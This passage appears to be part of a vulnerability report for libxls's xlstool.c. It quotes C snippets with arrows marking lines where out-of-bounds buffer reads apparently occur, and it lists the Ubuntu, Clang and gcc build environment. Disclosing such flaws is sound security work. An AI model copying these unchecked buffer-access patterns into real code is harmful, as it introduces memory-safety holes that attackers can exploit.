    				struct { unsigned short idx; unsigned char ident; unsigned char lvl; } *styl;
    				styl = (void *)buf;
    
    				printf("    idx: 0x%x\n", styl->idx & 0x07FF); <----------
    				if(styl->idx & 0x8000) {
    					printf("  ident: 0x%x\n", styl->ident);
    					printf("  level: 0x%x\n", styl->lvl); <---------
    				} else {
    					char *s = get_string((char *)&buf[2], bof1.size - 2, 1, pWB);
    					printf("  name=%s\n", s);
                        free(s);
    				}
    			}
    			break;
    

xlstool.c:264-267

    for(i=0; i<len/2; i++)
        {
            w[i] = (BYTE)s[2*i] + ((BYTE)s[2*i+1] << 8); <----------
        }
    
    

xlstool.c:406-413

    if(!pWB->is5ver) {
    		// unicode strings have a format byte before the string
            if (ofs + 1 > len) {
                return NULL;
            }
    		flag=*(BYTE*)(str+ofs); <-----------
    		ofs++;
    	}
    

xlstool.c:392-296

    if (ofs + 2 > len) {
                return NULL;
            }
            ln= ((BYTE*)str)[0] + (((BYTE*)str)[1] << 8); <------------
            ofs+=2;
    
    

xlstool.c:295-299

    for(i=0; i<len; ++i) {
            if(str[i] & (BYTE)0x80) { <-------------
                ++utf8_chars;
            }
        }
    
    

**Environment**

Ubuntu 16.04  
Clang 10.0.1  
gcc 5.5

Tag

#ubuntu